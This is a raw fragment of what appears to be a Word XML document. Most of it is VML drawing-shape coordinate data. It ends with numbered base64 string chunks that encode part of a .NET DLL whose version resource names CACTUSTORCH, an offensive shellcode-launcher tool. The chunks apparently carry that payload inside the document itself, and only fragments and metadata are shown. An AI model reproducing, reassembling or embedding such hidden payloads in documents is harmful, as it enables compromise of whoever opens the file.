,13927,2996,13931,2996,13935,2996,13939,2996,13943,2996,13948,2996,13952,2996,13957,2996,13962,2996,13966,2996,13971,2996,13976,2996,13981,2996,13986,2996,13992,2996,13997,2996,14002,2996,14008,2996,14014,2996,14019,2996,14025,2996,14031,2996,14037,2996,14043,2996,14050,2996,14056,2996,14056,2996,14056,2996,14056,2996,14056,2996,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2995,14056,2994,14056,2994,14056,2994,14056,2994,14056,2994,14056,2994,14056,2993,14056,2993,14056,2993,14056,2993,14056,2992,14056,2992,14056,2992,14056,2992,14056,2991,14056,2991,14056,2991,14056,2990,14056,2990,14056,2989,14056,2989,14056,2989,14056,2988,14056,2988,14056,2987,14056,2987,14056,2986,14056,2985,14056,2985,14056,2984,14056,2984,14056,2983,14056,2982,14056,2982,14056,2981,14056,2980,14056,2979,14056,2979,14056,2978,14056,2977,14056,2976,14056,2975,14056,2974,14056,2973,14056,2972,14056,2971,14056,2970,14056,2969,14056,2968,14056,2967,14056,2965,14056,2964,14056,2963,14056,2962,14056,2960,14056,2959,14056,2958,14056,2956,14056,2955,14056,2953,14056,2952,14056,2950,14056,2949,14056,2947,14056,2945,14056,2944,14056,2942,14056,2940,14056,2938,14056,2936,14056,2934,14056,2932,14056,2930,14056,2928,14056,2926,14056,2924,14056,2922,14056,2920,14056,2918,14056,2915,14056,2913,14056,2911,14056,2908,14056,2906,14056,2903,14056,2901,14056,2898,14056,2895,14056,2893,14056,2890,14056,2887,14056,2884,14056,2881,14056,2878,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14056,2875,14055,2875,14055,2875,14055,2875,14055,2875,14055,2875,14055,2875,14054,2875,14054,2875,14054,2875,14054,2875,14053,2875,14053,2875,14053,2875,14052,2875,14052,2875,14052,2875,14051,2875,14051,2875,14050,2875,14050,2875,14049,2875,14048,2875,14048,2875,14047,2875,14046,2875,14046,2875,14045,2875,14044,2875,14043,2875,14042,2875,14041,2875,14040,2875,14039,2875,14038,2875,14037,2875,14036,2875,14035,2875,14034,2875,14032,2875,14031,2875,14029,2875,14028,2875,14027,2875,14025,2875,14023,2875,14022,2875,14020,2875,14018,2875,14016,2875,14014,2875,14013,2875,14011,2875,14008,2875,14006,2875,14004,2875,14002,2875,14000,2875,13997,2875,13995,2875,13992,2875,13990,2875,13987,2875,13984,2875,13981,2875,13979,2875,13976,2875,13973,2875,13970,2875,13966,2875,13963,2875,13960,2875,13956,2875,13953,2875,13949,2875,13946,2875,13942,2875,13938,2875,13934,2875,13930,2875,13926,2875,13922,2875,13918,2875,13914,2875,13909,2875,13905,2875,13900,2875,13895,2875,13891,2875,13886,2875,13881,2875,13876,2875,13871,2875,13865,2875,13860,2875,13855,2875,13849,2875,13843,2875,13838,2875,13832,2875,13826,2875,13820,2875,13814,2875,13807,2875,13801e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:721.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,14430" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:14430;width:130;height:270" coordorigin="2370,14430" coordsize="130,270" path="m2395,14446l2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2397,14446,2397,14446,2397,14446,2397,14446,2397,14446,2398,14446,2398,14446,2398,14446,2398,14446,2399,14446,2399,14446,2399,14446,2399,14446,2400,14446,2400,14446,2400,14446,2401,14446,2401,14446,2402,14446,2402,14446,2403,14446,2403,14446,2404,14446,2404,14446,2405,14446,2405,14446,2406,14446,2406,14446,2407,14446,2408,14446,2408,14446,2409,14446,2410,14446,2411,14446,2411,14446,2412,14446,2413,14446,2414,14446,2415,14446,2416,14446,2417,14446,2418,14446,2419,14446,2420,14446,2421,14446,2422,14446,2423,14446,2424,14446,2425,14446,2426,14446,2428,14446,2429,14446,2430,14446,2432,14446,2433,14446,2434,14446,2436,14446,2437,14446,2439,14446,2441,14446,2442,14446,2444,14446,2445,14446,2447,14446,2449,14446,2451,14446,2453,14446,2454,14446,2456,14446,2458,14446,2460,14446,2462,14446,2464,14446,2466,14446,2469,14446,2471,14446,2473,14446,2475,14446,2478,14446,2480,14446,2482,14446,2485,14446,2487,14446,2490,14446,2493,14446,2495,14446,2498,14446,2501,14446,2504,14446,2506,14446,2509,14446,2512,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14448,2515,14448,2515,14448,2515,14448,2515,14449,2515,14449,2515,14449,2515,14450,2515,14450,2515,14450,2515,14451,2515,14451,2515,14452,2515,14452,2515,14453,2515,14453,2515,14454,2515,14455,2515,14455,2515,14456,2515,14457,2515,14457,2515,14458,2515,14459,2515,14460,2515,14461,2515,14462,2515,14463,2515,14464,2515,14465,2515,14466,2515,14468,2515,14469,2515,14470,2515,14471,2515,14473,2515,14474,2515,14476,2515,14477,2515,14479,2515,14481,2515,14482,2515,14484,2515,14486,2515,14488,2515,14490,2515,14492,2515,14494,2515,14496,2515,14498,2515,14500,2515,14503,2515,14505,2515,14508,2515,14510,2515,14513,2515,14515,2515,14518,2515,14521,2515,14524,2515,14527,2515,14530,2515,14533,2515,14536,2515,14539,2515,14543,2515,14546,2515,14549,2515,14553,2515,14557,2515,14560,2515,14564,2515,14568,2515,14572,2515,14576,2515,14580,2515,14584,2515,14589,2515,14593,2515,14598,2515,14602,2515,14607,2515,14612,2515,14617,2515,14622,2515,14627,2515,14632,2515,14637,2515,14642,2515,14648,2515,14653,2515,14659,2515,14665,2515,14671,2515,14677,2515,14683,2515,14689,2515,14695,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2513,14701,2513,14701,2513,14701,2513,14701,2512,14701,2512,14701,2512,14701,2512,14701,2511,14701,2511,14701,2511,14701,2510,14701,2510,14701,2510,14701,2509,14701,2509,14701,2508,14701,2508,14701,2507,14701,2507,14701,2506,14701,2506,14701,2505,14701,2505,14701,2504,14701,2503,14701,2503,14701,2502,14701,2501,14701,2501,14701,2500,14701,2499,14701,2498,14701,2497,14701,2497,14701,2496,14701,2495,14701,2494,14701,2493,14701,2492,14701,2491,14701,2490,14701,2489,14701,2488,14701,2486,14701,2485,14701,2484,14701,2483,14701,2481,14701,2480,14701,2479,14701,2477,14701,2476,14701,2475,14701,2473,14701,2472,14701,2470,14701,2468,14701,2467,14701,2465,14701,2463,14701,2462,14701,2460,14701,2458,14701,2456,14701,2454,14701,2452,14701,2450,14701,2448,14701,2446,14701,2444,14701,2442,14701,2440,14701,2437,14701,2435,14701,2433,14701,2430,14701,2428,14701,2426,14701,2423,14701,2420,14701,2418,14701,2415,14701,2412,14701,2410,14701,2407,14701,2404,14701,2401,14701,2398,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14700,2395,14700,2395,14700,2395,14700,2395,14700,2395,14699,2395,14699,2395,14699,2395,14698,2395,14698,2395,14698,2395,14697,2395,14697,2395,14696,2395,14696,2395,14695,2395,14695,2395,14694,2395,14694,2395,14693,2395,14692,2395,14692,2395,14691,2395,14690,2395,14689,2395,14689,2395,14688,2395,14687,2395,14686,2395,14685,2395,14684,2395,14682,2395,14681,2395,14680,2395,14679,2395,14678,2395,14676,2395,14675,2395,14673,2395,14672,2395,14670,2395,14669,2395,14667,2395,14665,2395,14664,2395,14662,2395,14660,2395,14658,2395,14656,2395,14654,2395,14652,2395,14649,2395,14647,2395,14645,2395,14643,2395,14640,2395,14638,2395,14635,2395,14632,2395,14630,2395,14627,2395,14624,2395,14621,2395,14618,2395,14615,2395,14612,2395,14608,2395,14605,2395,14602,2395,14598,2395,14595,2395,14591,2395,14587,2395,14584,2395,14580,2395,14576,2395,14572,2395,14567,2395,14563,2395,14559,2395,14555,2395,14550,2395,14545,2395,14541,2395,14536,2395,14531,2395,14526,2395,14521,2395,14516,2395,14511,2395,14505,2395,14500,2395,14494,2395,14489,2395,14483,2395,14477,2395,14471,2395,14465,2395,14459,2395,14453,2395,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:721.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,14430" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:14430;width:130;height:270" coordorigin="2850,14430" coordsize="130,270" path="m2875,14446l2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2877,14446,2877,14446,2877,14446,2877,14446,2877,14446,2877,14446,2878,14446,2878,14446,2878,14446,2878,14446,2879,14446,2879,14446,2879,14446,2879,14446,2880,14446,2880,14446,2880,14446,2881,14446,2881,14446,2882,14446,2882,14446,2882,14446,2883,14446,2883,14446,2884,14446,2884,14446,2885,14446,2885,14446,2886,14446,2887,14446,2887,14446,2888,14446,2889,14446,2889,14446,2890,14446,2891,14446,2892,14446,2892,14446,2893,14446,2894,14446,2895,14446,2896,14446,2897,14446,2898,14446,2899,14446,2900,14446,2901,14446,2902,14446,2903,14446,2904,14446,2906,14446,2907,14446,2908,14446,2909,14446,2911,14446,2912,14446,2913,14446,2915,14446,2916,14446,2918,14446,2919,14446,2921,14446,2922,14446,2924,14446,2926,14446,2927,14446,2929,14446,2931,14446,2933,14446,2935,14446,2937,14446,2938,14446,2940,14446,2943,14446,2945,14446,2947,14446,2949,14446,2951,14446,2953,14446,2956,14446,2958,14446,2960,14446,2963,14446,2965,14446,2968,14446,2970,14446,2973,14446,2976,14446,2978,14446,2981,14446,2984,14446,2987,14446,2990,14446,2993,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14448,2996,14448,2996,14448,2996,14448,2996,14449,2996,14449,2996,14449,2996,14450,2996,14450,2996,14450,2996,14451,2996,14451,2996,14452,2996,14452,2996,14453,2996,14453,2996,14454,2996,14455,2996,14455,2996,14456,2996,14457,2996,14457,2996,14458,2996,14459,2996,14460,2996,14461,2996,14462,2996,14463,2996,14464,2996,14465,2996,14466,2996,14468,2996,14469,2996,14470,2996,14471,2996,14473,2996,14474,2996,14476,2996,14477,2996,14479,2996,14481,2996,14482,2996,14484,2996,14486,2996,14488,2996,14490,2996,14492,2996,14494,2996,14496,2996,14498,2996,14500,2996,14503,2996,14505,2996,14508,2996,14510,2996,14513,2996,14515,2996,14518,2996,14521,2996,14524,2996,14527,2996,14530,2996,14533,2996,14536,2996,14539,2996,14543,2996,14546,2996,14549,2996,14553,2996,14557,2996,14560,2996,14564,2996,14568,2996,14572,2996,14576,2996,14580,2996,14584,2996,14589,2996,14593,2996,14598,2996,14602,2996,14607,2996,14612,2996,14617,2996,14622,2996,14627,2996,14632,2996,14637,2996,14642,2996,14648,2996,14653,2996,14659,2996,14665,2996,14671,2996,14677,2996,14683,2996,14689,2996,14695,2996,14701,2996,14701,2996,14701,2996,14701,2996,14701,2996,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2994,14701,2994,14701,2994,14701,2994,14701,2994,14701,2994,14701,2993,14701,2993,14701,2993,14701,2993,14701,2992,14701,2992,14701,2992,14701,2992,14701,2991,14701,2991,14701,2991,14701,2990,14701,2990,14701,2989,14701,2989,14701,2989,14701,2988,14701,2988,14701,2987,14701,2987,14701,2986,14701,2985,14701,2985,14701,2984,14701,2984,14701,2983,14701,2982,14701,2982,14701,2981,14701,2980,14701,2979,14701,2979,14701,2978,14701,2977,14701,2976,14701,2975,14701,2974,14701,2973,14701,2972,14701,2971,14701,2970,14701,2969,14701,2968,14701,2967,14701,2965,14701,2964,14701,2963,14701,2962,14701,2960,14701,2959,14701,2958,14701,2956,14701,2955,14701,2953,14701,2952,14701,2950,14701,2949,14701,2947,14701,2945,14701,2944,14701,2942,14701,2940,14701,2938,14701,2936,14701,2934,14701,2932,14701,2930,14701,2928,14701,2926,14701,2924,14701,2922,14701,2920,14701,2918,14701,2915,14701,2913,14701,2911,14701,2908,14701,2906,14701,2903,14701,2901,14701,2898,14701,2895,14701,2893,14701,2890,14701,2887,14701,2884,14701,2881,14701,2878,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14700,2875,14700,2875,14700,2875,14700,2875,14700,2875,14699,2875,14699,2875,14699,2875,14698,2875,14698,2875,14698,2875,14697,2875,14697,2875,14696,2875,14696,2875,14695,2875,14695,2875,14694,2875,14694,2875,14693,2875,14692,2875,14692,2875,14691,2875,14690,2875,14689,2875,14689,2875,14688,2875,14687,2875,14686,2875,14685,2875,14684,2875,14682,2875,14681,2875,14680,2875,14679,2875,14678,2875,14676,2875,14675,2875,14673,2875,14672,2875,14670,2875,14669,2875,14667,2875,14665,2875,14664,2875,14662,2875,14660,2875,14658,2875,14656,2875,14654,2875,14652,2875,14649,2875,14647,2875,14645,2875,14643,2875,14640,2875,14638,2875,14635,2875,14632,2875,14630,2875,14627,2875,14624,2875,14621,2875,14618,2875,14615,2875,14612,2875,14608,2875,14605,2875,14602,2875,14598,2875,14595,2875,14591,2875,14587,2875,14584,2875,14580,2875,14576,2875,14572,2875,14567,2875,14563,2875,14559,2875,14555,2875,14550,2875,14545,2875,14541,2875,14536,2875,14531,2875,14526,2875,14521,2875,14516,2875,14511,2875,14505,2875,14500,2875,14494,2875,14489,2875,14483,2875,14477,2875,14471,2875,14465,2875,14459,2875,14453,2875,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:15050;width:130;height:270" coordorigin="2370,15050" coordsize="130,270" path="m2395,15077l2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2397,15077,2397,15077,2397,15077,2397,15077,2397,15077,2398,15077,2398,15077,2398,15077,2398,15077,2399,15077,2399,15077,2399,15077,2399,15077,2400,15077,2400,15077,2400,15077,2401,15077,2401,15077,2402,15077,2402,15077,2403,15077,2403,15077,2404,15077,2404,15077,2405,15077,2405,15077,2406,15077,2406,15077,2407,15077,2408,15077,2408,15077,2409,15077,2410,15077,2411,15077,2411,15077,2412,15077,2413,15077,2414,15077,2415,15077,2416,15077,2417,15077,2418,15077,2419,15077,2420,15077,2421,15077,2422,15077,2423,15077,2424,15077,2425,15077,2426,15077,2428,15077,2429,15077,2430,15077,2432,15077,2433,15077,2434,15077,2436,15077,2437,15077,2439,15077,2441,15077,2442,15077,2444,15077,2445,15077,2447,15077,2449,15077,2451,15077,2453,15077,2454,15077,2456,15077,2458,15077,2460,15077,2462,15077,2464,15077,2466,15077,2469,15077,2471,15077,2473,15077,2475,15077,2478,15077,2480,15077,2482,15077,2485,15077,2487,15077,2490,15077,2493,15077,2495,15077,2498,15077,2501,15077,2504,15077,2506,15077,2509,15077,2512,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15078,2515,15078,2515,15078,2515,15078,2515,15078,2515,15079,2515,15079,2515,15079,2515,15080,2515,15080,2515,15080,2515,15081,2515,15081,2515,15082,2515,15082,2515,15083,2515,15083,2515,15084,2515,15084,2515,15085,2515,15086,2515,15086,2515,15087,2515,15088,2515,15089,2515,15089,2515,15090,2515,15091,2515,15092,2515,15093,2515,15094,2515,15096,2515,15097,2515,15098,2515,15099,2515,15100,2515,15102,2515,15103,2515,15105,2515,15106,2515,15108,2515,15109,2515,15111,2515,15113,2515,15114,2515,15116,2515,15118,2515,15120,2515,15122,2515,15124,2515,15126,2515,15129,2515,15131,2515,15133,2515,15135,2515,15138,2515,15140,2515,15143,2515,15146,2515,15148,2515,15151,2515,15154,2515,15157,2515,15160,2515,15163,2515,15166,2515,15170,2515,15173,2515,15176,2515,15180,2515,15183,2515,15187,2515,15191,2515,15194,2515,15198,2515,15202,2515,15206,2515,15211,2515,15215,2515,15219,2515,15223,2515,15228,2515,15233,2515,15237,2515,15242,2515,15247,2515,15252,2515,15257,2515,15262,2515,15267,2515,15273,2515,15278,2515,15284,2515,15289,2515,15295,2515,15301,2515,15307,2515,15313,2515,15319,2515,15325,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2513,15332,2513,15332,2513,15332,2513,15332,2512,15332,2512,15332,2512,15332,2512,15332,2511,15332,2511,15332,2511,15332,2510,15332,2510,15332,2510,15332,2509,15332,2509,15332,2508,15332,2508,15332,2507,15332,2507,15332,2506,15332,2506,15332,2505,15332,2505,15332,2504,15332,2503,15332,2503,15332,2502,15332,2501,15332,2501,15332,2500,15332,2499,15332,2498,15332,2497,15332,2497,15332,2496,15332,2495,15332,2494,15332,2493,15332,2492,15332,2491,15332,2490,15332,2489,15332,2488,15332,2486,15332,2485,15332,2484,15332,2483,15332,2481,15332,2480,15332,2479,15332,2477,15332,2476,15332,2475,15332,2473,15332,2472,15332,2470,15332,2468,15332,2467,15332,2465,15332,2463,15332,2462,15332,2460,15332,2458,15332,2456,15332,2454,15332,2452,15332,2450,15332,2448,15332,2446,15332,2444,15332,2442,15332,2440,15332,2437,15332,2435,15332,2433,15332,2430,15332,2428,15332,2426,15332,2423,15332,2420,15332,2418,15332,2415,15332,2412,15332,2410,15332,2407,15332,2404,15332,2401,15332,2398,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15330,2395,15330,2395,15330,2395,15330,2395,15329,2395,15329,2395,15329,2395,15328,2395,15328,2395,15328,2395,15327,2395,15327,2395,15326,2395,15326,2395,15325,2395,15325,2395,15324,2395,15323,2395,15323,2395,15322,2395,15321,2395,15321,2395,15320,2395,15319,2395,15318,2395,15317,2395,15316,2395,15315,2395,15314,2395,15313,2395,15312,2395,15310,2395,15309,2395,15308,2395,15307,2395,15305,2395,15304,2395,15302,2395,15301,2395,15299,2395,15297,2395,15296,2395,15294,2395,15292,2395,15290,2395,15288,2395,15286,2395,15284,2395,15282,2395,15280,2395,15278,2395,15275,2395,15273,2395,15270,2395,15268,2395,15265,2395,15263,2395,15260,2395,15257,2395,15254,2395,15251,2395,15248,2395,15245,2395,15242,2395,15239,2395,15235,2395,15232,2395,15229,2395,15225,2395,15221,2395,15218,2395,15214,2395,15210,2395,15206,2395,15202,2395,15198,2395,15194,2395,15189,2395,15185,2395,15180,2395,15176,2395,15171,2395,15166,2395,15161,2395,15156,2395,15151,2395,15146,2395,15141,2395,15136,2395,15130,2395,15125,2395,15119,2395,15113,2395,15107,2395,15101,2395,15095,2395,15089,2395,15083,2395,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:15050;width:130;height:270" coordorigin="2850,15050" coordsize="130,270" path="m2875,15077l2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2877,15077,2877,15077,2877,15077,2877,15077,2877,15077,2877,15077,2878,15077,2878,15077,2878,15077,2878,15077,2879,15077,2879,15077,2879,15077,2879,15077,2880,15077,2880,15077,2880,15077,2881,15077,2881,15077,2882,15077,2882,15077,2882,15077,2883,15077,2883,15077,2884,15077,2884,15077,2885,15077,2885,15077,2886,15077,2887,15077,2887,15077,2888,15077,2889,15077,2889,15077,2890,15077,2891,15077,2892,15077,2892,15077,2893,15077,2894,15077,2895,15077,2896,15077,2897,15077,2898,15077,2899,15077,2900,15077,2901,15077,2902,15077,2903,15077,2904,15077,2906,15077,2907,15077,2908,15077,2909,15077,2911,15077,2912,15077,2913,15077,2915,15077,2916,15077,2918,15077,2919,15077,2921,15077,2922,15077,2924,15077,2926,15077,2927,15077,2929,15077,2931,15077,2933,15077,2935,15077,2937,15077,2938,15077,2940,15077,2943,15077,2945,15077,2947,15077,2949,15077,2951,15077,2953,15077,2956,15077,2958,15077,2960,15077,2963,15077,2965,15077,2968,15077,2970,15077,2973,15077,2976,15077,2978,15077,2981,15077,2984,15077,2987,15077,2990,15077,2993,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15078,2996,15078,2996,15078,2996,15078,2996,15078,2996,15079,2996,15079,2996,15079,2996,15080,2996,15080,2996,15080,2996,15081,2996,15081,2996,15082,2996,15082,2996,15083,2996,15083,2996,15084,2996,15084,2996,15085,2996,15086,2996,15086,2996,15087,2996,15088,2996,15089,2996,15089,2996,15090,2996,15091,2996,15092,2996,15093,2996,15094,2996,15096,2996,15097,2996,15098,2996,15099,2996,15100,2996,15102,2996,15103,2996,15105,2996,15106,2996,15108,2996,15109,2996,15111,2996,15113,2996,15114,2996,15116,2996,15118,2996,15120,2996,15122,2996,15124,2996,15126,2996,15129,2996,15131,2996,15133,2996,15135,2996,15138,2996,15140,2996,15143,2996,15146,2996,15148,2996,15151,2996,15154,2996,15157,2996,15160,2996,15163,2996,15166,2996,15170,2996,15173,2996,15176,2996,15180,2996,15183,2996,15187,2996,15191,2996,15194,2996,15198,2996,15202,2996,15206,2996,15211,2996,15215,2996,15219,2996,15223,2996,15228,2996,15233,2996,15237,2996,15242,2996,15247,2996,15252,2996,15257,2996,15262,2996,15267,2996,15273,2996,15278,2996,15284,2996,15289,2996,15295,2996,15301,2996,15307,2996,15313,2996,15319,2996,15325,2996,15332,2996,15332,2996,15332,2996,15332,2996,15332,2996,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2994,15332,2994,15332,2994,15332,2994,15332,2994,15332,2994,15332,2993,15332,2993,15332,2993,15332,2993,15332,2992,15332,2992,15332,2992,15332,2992,15332,2991,15332,2991,15332,2991,15332,2990,15332,2990,15332,2989,15332,2989,15332,2989,15332,2988,15332,2988,15332,2987,15332,2987,15332,2986,15332,2985,15332,2985,15332,2984,15332,2984,15332,2983,15332,2982,15332,2982,15332,2981,15332,2980,15332,2979,15332,2979,15332,2978,15332,2977,15332,2976,15332,2975,15332,2974,15332,2973,15332,2972,15332,2971,15332,2970,15332,2969,15332,2968,15332,2967,15332,2965,15332,2964,15332,2963,15332,2962,15332,2960,15332,2959,15332,2958,15332,2956,15332,2955,15332,2953,15332,2952,15332,2950,15332,2949,15332,2947,15332,2945,15332,2944,15332,2942,15332,2940,15332,2938,15332,2936,15332,2934,15332,2932,15332,2930,15332,2928,15332,2926,15332,2924,15332,2922,15332,2920,15332,2918,15332,2915,15332,2913,15332,2911,15332,2908,15332,2906,15332,2903,15332,2901,15332,2898,15332,2895,15332,2893,15332,2890,15332,2887,15332,2884,15332,2881,15332,2878,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15330,2875,15330,2875,15330,2875,15330,2875,15329,2875,15329,2875,15329,2875,15328,2875,15328,2875,15328,2875,15327,2875,15327,2875,15326,2875,15326,2875,15325,2875,15325,2875,15324,2875,15323,2875,15323,2875,15322,2875,15321,2875,15321,2875,15320,2875,15319,2875,15318,2875,15317,2875,15316,2875,15315,2875,15314,2875,15313,2875,15312,2875,15310,2875,15309,2875,15308,2875,15307,2875,15305,2875,15304,2875,15302,2875,15301,2875,15299,2875,15297,2875,15296,2875,15294,2875,15292,2875,15290,2875,15288,2875,15286,2875,15284,2875,15282,2875,15280,2875,15278,2875,15275,2875,15273,2875,15270,2875,15268,2875,15265,2875,15263,2875,15260,2875,15257,2875,15254,2875,15251,2875,15248,2875,15245,2875,15242,2875,15239,2875,15235,2875,15232,2875,15229,2875,15225,2875,15221,2875,15218,2875,15214,2875,15210,2875,15206,2875,15202,2875,15198,2875,15194,2875,15189,2875,15185,2875,15180,2875,15176,2875,15171,2875,15166,2875,15161,2875,15156,2875,15151,2875,15146,2875,15141,2875,15136,2875,15130,2875,15125,2875,15119,2875,15113,2875,15107,2875,15101,2875,15095,2875,15089,2875,15083,2875,15077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86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156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"ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAA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NAM0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AAAAVgBTAF8A"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157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"VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAA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AAEA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AAAAAD8AAAAA"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158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"AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkA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bgBm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AG8AAAAAACQA"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159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"BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdABy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AGkA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bgBnAEYAaQBs"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160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"AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMA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bwBt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AG0AZQBuAHQA"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161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"cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBu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AHkA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TgBhAG0AZQAA"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162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"AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAA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AABD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AEEAQwBUAFUA"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163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"UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAA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ADEA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LgAwAC4AMAAu"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164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"ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQA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VQBT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AFQATwBSAEMA"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165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"SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0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AAAA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QwBBAEMAVABV"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166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"AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEA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cgBr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AHMAAAAAAAAA"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167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"AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBB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AEM